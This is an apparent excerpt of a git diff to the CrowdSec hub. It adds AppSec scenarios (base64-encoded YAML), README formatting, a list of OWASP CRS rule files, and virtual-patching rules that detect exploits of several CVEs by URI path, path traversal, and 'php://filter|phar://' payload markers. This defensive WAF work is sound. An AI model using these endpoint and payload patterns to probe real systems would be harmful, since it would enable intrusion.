+ "content": "dHlwZTogbGVha3kKZmlsdGVyOiBldnQuUGFyc2VkLnByb2dyYW0gPT0gJ2Nyb3dkc2VjLWFwcHNlYycgJiYgZXZ0LkFwcHNlYy5IYXNJbkJhbmRNYXRjaGVzID09IHRydWUgJiYgZXZ0LlBhcnNlZC5hY3Rpb24gaW4gWyJkZW55IiwgImRyb3AiXQojZGVidWc6IHRydWUKbmFtZTogY3Jvd2RzZWN1cml0eS9jcm93ZHNlYy1hcHBzZWMtaW5iYW5kCmRlc2NyaXB0aW9uOiBJUCBoYXMgdHJpZ2dlcmVkIG11bHRpcGxlcyBJbiBCYW5kIENyb3dkU2VjIGFwcHNlYyBydWxlcwpibGFja2hvbGU6IDFtCmxlYWtzcGVlZDogMzBzCmNhcGFjaXR5OiAxCmdyb3VwYnk6IGV2dC5NZXRhLnNvdXJjZV9pcApkaXN0aW5jdDogZXZ0LkFwcHNlYy5HZXROYW1lKCkKbGFiZWxzOgogIGNvbmZpZGVuY2U6IDMKICBzcG9vZmFibGU6IDAKICBjbGFzc2lmaWNhdGlvbjoKICAgLSBhdHRhY2suVDExOTAKICBiZWhhdmlvcjogImh0dHA6ZXhwbG9pdCIKICBsYWJlbDogIlRyaWdnZXJlZCBtdWx0aXBsZSBpbmJhbmQgQ3Jvd2RTZWMgYXBwc2VjIHJ1bGVzIgogIHNlcnZpY2U6IGh0dHAKICByZW1lZGlhdGlvbjogdHJ1ZQo=",
+ "description": "IP has triggered multiples In Band CrowdSec appsec rules",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "attack.T1190"
+ ],
+ "confidence": 3,
+ "label": "Triggered multiple inband CrowdSec appsec rules",
+ "remediation": true,
+ "service": "http",
+ "spoofable": 0
+ }
+ },
+ "crowdsecurity/crowdsec-appsec-outofband": {
+ "path": "scenarios/crowdsecurity/crowdsec-appsec-outofband.yaml",
+ "version": "0.3",
+ "versions": {
+ "0.1": {
+ "digest": "1e9a7f01a451b2322f1125b0dfba3c5cdd3dca53e69eb38f245a3e25af6952df",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "59393376cbcfb85cd7e609c5fe2c958aa60c519d7ff0ee310f1bab2af01d38e9",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "47b3cd0887f58785c2b6a064f4da46e36a17a6e7d34c4893b0bd8308271fe0be",
+ "deprecated": false
+ }
+ },
+ "content": "IyBqdXN0IGNvdW50IGRpc3RpbmN0IG51bWJlciBvZiByZXF1ZXN0cyBnZXR0aW5nIGJsb2NrZWQKdHlwZTogbGVha3kKZmlsdGVyOiBldnQuUGFyc2VkLnByb2dyYW0gPT0gJ2Nyb3dkc2VjLXdhYXAnICYmIGV2dC5BcHBzZWMuSGFzSW5CYW5kTWF0Y2hlcyA9PSBmYWxzZSAmJiBldnQuUGFyc2VkLmFjdGlvbiBpbiBbImRlbnkiLCAiZHJvcCJdCm5hbWU6IGNyb3dkc2VjdXJpdHkvY3Jvd2RzZWMtYXBwc2VjLW91dG9mYmFuZApkZXNjcmlwdGlvbjogSVAgaGFzIHRyaWdnZXJlZCBtb3JlIHRoYW4gNSBDcm93ZFNlYyBPdXQgT2YgQmFuZCBXYWFwIHJ1bGVzCmJsYWNraG9sZTogMm0KbGVha3NwZWVkOiAzMHMKY2FwYWNpdHk6IDUKbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICByZW1lZGlhdGlvbjogdHJ1ZQpncm91cGJ5OiAiZXZ0Lk1ldGEuc291cmNlX2lwIgojLS0tCiMgYXQgbGVhc3QgcmVxdWVzdHMgYmxvY2tlZCBvbiAzIGRpc3RpbmN0IFVSSXMKI3R5cGU6IGxlYWt5CiNkZWJ1ZzogdHJ1ZQojZmlsdGVyOiBldnQuUGFyc2VkLnByb2dyYW0gPT0gJ2Nyb3dkc2VjLXdhYXAnICYmIGV2dC5QYXJzZWQuYWN0aW9uID09ICJkZW55IgojbmFtZTogY3Jvd2RzZWN1cml0eS93YWYtcHJvYmluZwojZGVzY3JpcHRpb246ICJXQUYgcHJvYmluZyIKI2JsYWNraG9sZTogMm0KI2xlYWtzcGVlZDogNjBzCiNjYXBhY2l0eTogNQojZ3JvdXBieTogImV2dC5NZXRhLnNvdXJjZV9pcCArIGV2dC5QYXJzZWQudGFyZ2V0X3VyaSIKI2xhYmVsczoKIyAgdHlwZTogZXhwbG9pdAojICByZW1lZGlhdGlvbjogdHJ1ZQojLS0tCiMgIyBhdCBsZWFzdCA1IHJlcXVlc3RzIGJsb2NrZWQgd2l0aCAqKmRpc3RpbmN0KiogSURzCiN0eXBlOiBjb25kaXRpb25hbAojZGVidWc6IHRydWUKI25hbWU6IGNyb3dkc2VjdXJpdHkveHNzLXByb2JpbmcKI2Rlc2NyaXB0aW9uOiBhdCBsZWFzdCA1IGRpZmZlcmVudCBYU1MgcnVsZXMKI2ZpbHRlcjogZXZ0LlBhcnNlZC5wcm9ncmFtID09ICdjcm93ZHNlYy13YWFwJyAmJiBldnQuUGFyc2VkLmFjdGlvbiA9PSAiZGVueSIKI2NvbmRpdGlvbjogbGVuKCBkaXN0aW5jdCggbWVyZ2UoIGFsbChldnQuUXVldWUsIHsgIy5XYWFwLkdldElEcygpfSkgKSApICkgPiA1CiNjb25kaXRpb246IHwKIyAgTG9nSW5mbygiJSt2IiwgRmxhdHRlbkRpc3RpbmN0KCAKIyAgICAgIG1hcCggcXVldWUuUXVldWUsIAojICAgICAgIy5XYWFwLkJ5VGFnUngoIi4qeHNzLioiKS5HZXRSdWxlSURzKCkKIyAgICAgICkgCiMgICAgKSkgJiYKIyAgbGVuKCAKIyAgICBGbGF0dGVuRGlzdGluY3QoIAojICAgICAgbWFwKCBxdWV1ZS5RdWV1ZSwgCiMgICAgICAjLldhYXAuQnlUYWdSeCgiLip4c3MuKiIpLkdldFJ1bGVJRHMoKQojICAgICAgKSAKIyAgICApKSA+IDUKI2NvbmRpdGlvbjogJ0Rpc3RhbmNlKCJhYSIsICJiYiIsICJjYyIsIHsgIy5QYXJzZWQudG90byA9PSAxIH0pJwojY2FwYWNpdHk6IC0xCiNjYWNoZV9zaXplOiAxMDAwCiNsZWFrc3BlZWQ6IDMwcwojZGlzdGluY3Q6IGV2dC5NZXRhLnNvdXJjZV9pcA==",
+ "description": "IP has triggered more than 5 CrowdSec Out Of Band Waap rules",
+ "author": "crowdsecurity",
+ "labels": {
+ "remediation": true,
+ "type": "exploit"
+ }
+ },
"crowdsecurity/dovecot-spam": {
"path": "scenarios/crowdsecurity/dovecot-spam.yaml",
"version": "0.4",
diff --git a/README.md b/README.md
index 11f356cc69c..69b32781ed5 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,3 @@
-
@@ -6,6 +5,7 @@
+
@@ -15,7 +15,6 @@
:speech_balloon: Gitter (Live chat)
-
> CrowdSec Hub for parsers, enrichers and scenarios.
# Foreword
@@ -30,20 +29,17 @@ Feel free to use the parsers/scenarios here as a source of inspiration.
`cscli` provides a `hubtest` sub-command to help contributors to create tests for parsers and scenarios.
-
## View & use existing tests
:warning: most of `cscli hubtest` commands are expected to be run from the root directory of the hub. A git clone of this repository is the easier way to work :warning:
> list existing tests
-`cscli hubtest list`
-
+`cscli hubtest list`
> run a specific test
-`cscli hubtest run [test-name]`
-
+`cscli hubtest run [test-name]`
> show current tests coverage
@@ -52,8 +48,9 @@ Feel free to use the parsers/scenarios here as a source of inspiration.
## Create your own (parser) test
We're going to create the CI tests for the dovecot-parser. Before you start :
- - you will need some *actual* logs
- - you'd better know if the service logs on its own or via syslog (we're in the later case here)
+
+- you will need some _actual_ logs
+- you'd better know if the service logs on its own or via syslog (we're in the later case here)
1. Create a new test
@@ -71,9 +68,9 @@ We're going to create the CI tests for the dovecot-parser. Before you start :
What is relevant here is that every test is composed of :
- - A log file and it's associated type (same `type` as seen in acquis `labels:type`)
- - A configuration specifying which parsers and/or scenarios must be enabled for the test
- - A *ultimately* list of assertions that must be run against the parsers and/or scenarios output
+- A log file and it's associated type (same `type` as seen in acquis `labels:type`)
+- A configuration specifying which parsers and/or scenarios must be enabled for the test
+- A _ultimately_ list of assertions that must be run against the parsers and/or scenarios output
Note: You can provide the parsers and scenarios you want in your test with `--parsers` and `--scenarios` (you can provide multiple parsers and scenarios)
@@ -81,7 +78,6 @@ If you want to test only a scenario, you can specify (`--ignore-parsers`) or set
2. Configure your test
-
We need to edit the test configuration to use the relevant parsers :
```bash
@@ -102,20 +98,20 @@ _note: the order doesn't matter. If the parser name is in the form `author/parse
Now we need to dump some actual logs into the test's log file :
```bash
-▶ cat > .tests/dovecot-logs/dovecot-logs.log
+▶ cat > .tests/dovecot-logs/dovecot-logs.log
Jan 28 10:16:13 dovecot-box dovecot[7508]: imap-login: Disconnected (auth failed, 1 attempts in 6 secs): user=, method=PLAIN, rip=4.4.4.4, lip=7.7.7.7, TLS, session=<3650VvK5bdIaW-iK>
Sep 8 07:16:29 canyon dovecot: auth-worker(24058): pam(toto,1.1.1.1,): pam_authenticate() failed: Authentication failure (password mismatch?)
Sep 8 07:46:51 canyon dovecot: auth-worker(24544): pam(toto,1.1.1.1): unknown user
```
-
3. Run the test for the first time
Now that we have config & logs, let's run it for the first time :
```bash
▶ cscli hubtest run dovecot-logs
+
INFO[27-09-2021 06:13:59 PM] Running test 'dovecot-logs'
INFO[27-09-2021 06:13:59 PM] parser 'crowdsecurity/dovecot-logs' installed successfully in runtime environment
INFO[27-09-2021 06:13:59 PM] parser 'crowdsecurity/syslog-logs' installed successfully in runtime environment
@@ -144,9 +140,8 @@ results["s01-parse"]["crowdsecurity/dovecot-logs"][0].Evt.Meta["source_ip"] == "
As our `parser.assert` is empty, the tool is generating some "suggested" asserts for us.
Your careful eye will keep only the ones relevant to the parser you're testing :
-
```bash
-▶ cat > .tests/dovecot-logs/parser.assert
+▶ cat > .tests/dovecot-logs/parser.assert
results["s01-parse"]["crowdsecurity/dovecot-logs"][0].Success == true
results["s01-parse"]["crowdsecurity/dovecot-logs"][0].Evt.Parsed["pid"] == "7508"
results["s01-parse"]["crowdsecurity/dovecot-logs"][0].Evt.Parsed["timestamp"] == "Jan 28 10:16:13"
@@ -188,11 +183,8 @@ results["s01-parse"]["crowdsecurity/dovecot-logs"][2].Evt.Meta["datasource_path"
results["s01-parse"]["crowdsecurity/dovecot-logs"][2].Evt.Meta["datasource_type"] == "file"
```
-
-
4. Test your newly crafted test
-
```bash
▶ cscli hubtest run dovecot-logs
INFO[27-09-2021 06:19:33 PM] Running test 'dovecot-logs'
@@ -203,17 +195,14 @@ Test 'dovecot-logs' passed successfully (39 assertions) 🟩
And be amazed.
-
-
## Debug your own (parser) test
Things went wrong ? Don't panic
When working on a test, you can as well pass expressions directly to `hubtest` command and see the results :
-
```bash
-▶ cscli hubtest eval dovecot-logs -e 'results["s01-parse"]["crowdsecurity/dovecot-logs"][2].Evt.Parsed'
+▶ cscli hubtest eval dovecot-logs -e 'results["s01-parse"]["crowdsecurity/dovecot-logs"][2].Evt.Parsed'
dovecot_login_result: unknown user
dovecot_remote_ip: 1.1.1.1
dovecot_user: toto
@@ -230,7 +219,3 @@ timestamp8601: ""
## Open your PR
yes.
-
-
-
-
diff --git a/appsec-configs/crowdsecurity/crs.yaml b/appsec-configs/crowdsecurity/crs.yaml
new file mode 100644
index 00000000000..240b0f04d2f
--- /dev/null
+++ b/appsec-configs/crowdsecurity/crs.yaml
@@ -0,0 +1,5 @@
+name: crowdsecurity/crs
+default_remediation: ban
+#log_level: debug
+outofband_rules:
+ - crowdsecurity/crs
\ No newline at end of file
diff --git a/appsec-configs/crowdsecurity/virtual-patching.yaml b/appsec-configs/crowdsecurity/virtual-patching.yaml
new file mode 100644
index 00000000000..d3d26bb7c5b
--- /dev/null
+++ b/appsec-configs/crowdsecurity/virtual-patching.yaml
@@ -0,0 +1,8 @@
+name: crowdsecurity/virtual-patching
+default_remediation: ban
+#log_level: debug
+inband_rules:
+ - crowdsecurity/base-config
+ - crowdsecurity/vpatch-*
+# inband_options:
+# disable_body_inspection: true
diff --git a/appsec-rules/crowdsecurity/base-config.yaml b/appsec-rules/crowdsecurity/base-config.yaml
new file mode 100644
index 00000000000..e8510465c8c
--- /dev/null
+++ b/appsec-rules/crowdsecurity/base-config.yaml
@@ -0,0 +1,11 @@
+name: crowdsecurity/base-config
+#### This file is intended to provide a basic configuration for coraza:
+#### - Set the body processors based on the content-type
+
+seclang_rules:
+ - Secrule REQUEST_HEADERS:Content-Type "@rx ^application/x-www-form-urlencoded" "id:100,phase:1,pass,nolog,noauditlog,ctl:requestBodyProcessor=URLENCODED"
+ - Secrule REQUEST_HEADERS:Content-Type "@rx ^multipart/form-data" "id:101,phase:1,pass,nolog,noauditlog,ctl:requestBodyProcessor=MULTIPART"
+ - Secrule REQUEST_HEADERS:Content-Type "@rx ^application/xml" "id:102,phase:1,pass,nolog,noauditlog,ctl:requestBodyProcessor=XML"
+ - Secrule REQUEST_HEADERS:Content-Type "@rx ^application/json" "id:103,phase:1,pass,nolog,noauditlog,ctl:requestBodyProcessor=JSON"
+ - Secrule REQUEST_HEADERS:Content-Type "@rx ^text/xml" "id:104,phase:1,pass,nolog,noauditlog,ctl:requestBodyProcessor=XML"
+ - SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" "id:105,phase:1,pass,nolog,noauditlog,ctl:requestBodyProcessor=RAW" #Use our custom RAW body processor, just to have REQUEST_BODY set
diff --git a/appsec-rules/crowdsecurity/crs.yaml b/appsec-rules/crowdsecurity/crs.yaml
new file mode 100644
index 00000000000..720bea0d27a
--- /dev/null
+++ b/appsec-rules/crowdsecurity/crs.yaml
@@ -0,0 +1,180 @@
+name: crowdsecurity/crs
+seclang_rules:
+ - SecRuleEngine On
+ - SecRequestBodyAccess On
+seclang_files_rules:
+ - crs-setup.conf
+ - REQUEST-901-INITIALIZATION.conf
+ - REQUEST-905-COMMON-EXCEPTIONS.conf
+ - REQUEST-911-METHOD-ENFORCEMENT.conf
+ - REQUEST-913-SCANNER-DETECTION.conf
+ - REQUEST-920-PROTOCOL-ENFORCEMENT.conf
+ - REQUEST-921-PROTOCOL-ATTACK.conf
+ - REQUEST-922-MULTIPART-ATTACK.conf
+ - REQUEST-930-APPLICATION-ATTACK-LFI.conf
+ - REQUEST-931-APPLICATION-ATTACK-RFI.conf
+ - REQUEST-932-APPLICATION-ATTACK-RCE.conf
+ - REQUEST-933-APPLICATION-ATTACK-PHP.conf
+ - REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
+ - REQUEST-941-APPLICATION-ATTACK-XSS.conf
+ - REQUEST-942-APPLICATION-ATTACK-SQLI.conf
+ - REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
+ - REQUEST-944-APPLICATION-ATTACK-JAVA.conf
+ - REQUEST-949-BLOCKING-EVALUATION.conf
+ - RESPONSE-950-DATA-LEAKAGES.conf
+ - RESPONSE-951-DATA-LEAKAGES-SQL.conf
+ - RESPONSE-952-DATA-LEAKAGES-JAVA.conf
+ - RESPONSE-953-DATA-LEAKAGES-PHP.conf
+ - RESPONSE-954-DATA-LEAKAGES-IIS.conf
+ - RESPONSE-955-WEB-SHELLS.conf
+ - RESPONSE-959-BLOCKING-EVALUATION.conf
+ - RESPONSE-980-CORRELATION.conf
+
+data:
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/crs-setup.conf
+ dest_file: crs-setup.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-901-INITIALIZATION.conf
+ dest_file: REQUEST-901-INITIALIZATION.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-905-COMMON-EXCEPTIONS.conf
+ dest_file: REQUEST-905-COMMON-EXCEPTIONS.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-911-METHOD-ENFORCEMENT.conf
+ dest_file: REQUEST-911-METHOD-ENFORCEMENT.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-913-SCANNER-DETECTION.conf
+ dest_file: REQUEST-913-SCANNER-DETECTION.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-920-PROTOCOL-ENFORCEMENT.conf
+ dest_file: REQUEST-920-PROTOCOL-ENFORCEMENT.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-921-PROTOCOL-ATTACK.conf
+ dest_file: REQUEST-921-PROTOCOL-ATTACK.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-922-MULTIPART-ATTACK.conf
+ dest_file: REQUEST-922-MULTIPART-ATTACK.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-930-APPLICATION-ATTACK-LFI.conf
+ dest_file: REQUEST-930-APPLICATION-ATTACK-LFI.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-931-APPLICATION-ATTACK-RFI.conf
+ dest_file: REQUEST-931-APPLICATION-ATTACK-RFI.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-932-APPLICATION-ATTACK-RCE.conf
+ dest_file: REQUEST-932-APPLICATION-ATTACK-RCE.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-933-APPLICATION-ATTACK-PHP.conf
+ dest_file: REQUEST-933-APPLICATION-ATTACK-PHP.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
+ dest_file: REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-941-APPLICATION-ATTACK-XSS.conf
+ dest_file: REQUEST-941-APPLICATION-ATTACK-XSS.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-942-APPLICATION-ATTACK-SQLI.conf
+ dest_file: REQUEST-942-APPLICATION-ATTACK-SQLI.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
+ dest_file: REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-944-APPLICATION-ATTACK-JAVA.conf
+ dest_file: REQUEST-944-APPLICATION-ATTACK-JAVA.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-949-BLOCKING-EVALUATION.conf
+ dest_file: REQUEST-949-BLOCKING-EVALUATION.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-950-DATA-LEAKAGES.conf
+ dest_file: RESPONSE-950-DATA-LEAKAGES.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-951-DATA-LEAKAGES-SQL.conf
+ dest_file: RESPONSE-951-DATA-LEAKAGES-SQL.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-952-DATA-LEAKAGES-JAVA.conf
+ dest_file: RESPONSE-952-DATA-LEAKAGES-JAVA.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-953-DATA-LEAKAGES-PHP.conf
+ dest_file: RESPONSE-953-DATA-LEAKAGES-PHP.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-954-DATA-LEAKAGES-IIS.conf
+ dest_file: RESPONSE-954-DATA-LEAKAGES-IIS.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-955-WEB-SHELLS.conf
+ dest_file: RESPONSE-955-WEB-SHELLS.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-959-BLOCKING-EVALUATION.conf
+ dest_file: RESPONSE-959-BLOCKING-EVALUATION.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-980-CORRELATION.conf
+ dest_file: RESPONSE-980-CORRELATION.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/crawlers-user-agents.data
+ dest_file: crawlers-user-agents.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/iis-errors.data
+ dest_file: iis-errors.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/java-classes.data
+ dest_file: java-classes.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/java-code-leakages.data
+ dest_file: java-code-leakages.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/java-errors.data
+ dest_file: java-errors.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/lfi-os-files.data
+ dest_file: lfi-os-files.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-config-directives.data
+ dest_file: php-config-directives.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-errors.data
+ dest_file: php-errors.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-errors-pl2.data
+ dest_file: php-errors-pl2.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-function-names-933150.data
+ dest_file: php-function-names-933150.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-function-names-933151.data
+ dest_file: php-function-names-933151.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-variables.data
+ dest_file: php-variables.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/restricted-files.data
+ dest_file: restricted-files.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/restricted-upload.data
+ dest_file: restricted-upload.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/scanners-headers.data
+ dest_file: scanners-headers.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/scanners-urls.data
+ dest_file: scanners-urls.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/scanners-user-agents.data
+ dest_file: scanners-user-agents.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/scripting-user-agents.data
+ dest_file: scripting-user-agents.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/sql-errors.data
+ dest_file: sql-errors.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/ssrf.data
+ dest_file: ssrf.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/unix-shell.data
+ dest_file: unix-shell.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/web-shells-php.data
+ dest_file: web-shells-php.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/windows-powershell-commands.data
+ dest_file: windows-powershell-commands.data
+ type: modsec
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2017-9841.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2017-9841.yaml
new file mode 100644
index 00000000000..68ffa64338f
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2017-9841.yaml
@@ -0,0 +1,23 @@
+name: crowdsecurity/vpatch-CVE-2017-9841
+description: "Detect CVE-2017-9841 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /util/php/eval-stdin.php
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "PHPUnit RCE (CVE-2017-9841)"
+ classification:
+ - cve.CVE-2017-9841
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-94
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2019-12989.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2019-12989.yaml
new file mode 100644
index 00000000000..6611e1ed838
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2019-12989.yaml
@@ -0,0 +1,43 @@
+name: crowdsecurity/vpatch-CVE-2019-12989
+description: "Detect CVE-2019-12989 exploits "
+rules:
+ - and:
+ - zones:
+ - METHOD
+ match:
+ type: equals
+ value: POST
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /sdwan/nitro/v1/config/get_package_file
+ - zones:
+ - ARGS
+ variables:
+ - action
+ transform:
+ - lowercase
+ match:
+ type: equals
+ value: "file_download"
+ - zones:
+ - BODY_ARGS
+ variables:
+ - json.get_package_file.site_name
+ match:
+ type: libinjectionSQL
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "citrix SQLi (CVE-2019-12989)"
+ classification:
+ - cve.CVE-2019-12989
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-89
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2020-11738.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2020-11738.yaml
new file mode 100644
index 00000000000..d42fbef1ca2
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2020-11738.yaml
@@ -0,0 +1,37 @@
+name: crowdsecurity/vpatch-CVE-2020-11738
+description: "Detect CVE-2020-11738 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /wp-admin/admin-ajax.php
+ - zones:
+ - ARGS
+ variables:
+ - action
+ match:
+ type: equals
+ value: duplicator_download
+ - zones:
+ - ARGS
+ variables:
+ - file
+ match:
+ type: contains
+ value: ".."
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "Wordpress Snap Creek Duplicator (CVE-2020-11738)"
+ classification:
+ - cve.CVE-2020-11738
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-22
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2021-22941.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2021-22941.yaml
new file mode 100644
index 00000000000..54dc411a9e1
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2021-22941.yaml
@@ -0,0 +1,35 @@
+name: crowdsecurity/vpatch-CVE-2021-22941
+description: "Detect CVE-2021-22941 exploits "
+rules:
+ - and:
+ - zones:
+ - METHOD
+ match:
+ type: equals
+ value: POST
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /upload.aspx
+ - zones:
+ - ARGS
+ variables:
+ - uploadid
+ match:
+ type: contains
+ value: ".."
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "Citrix RCE (CVE-2021-22941)"
+ classification:
+ - cve.CVE-2021-22941
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-284
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2021-3129.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2021-3129.yaml
new file mode 100644
index 00000000000..ad84d4c6599
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2021-3129.yaml
@@ -0,0 +1,30 @@
+name: crowdsecurity/vpatch-CVE-2021-3129
+description: "Detect CVE-2021-3129 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /_ignition/execute-solution
+ - zones:
+ - BODY_ARGS
+ variables:
+ - json.parameters.viewFile
+ match:
+ type: regex
+ value: "php://filter|phar://"
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
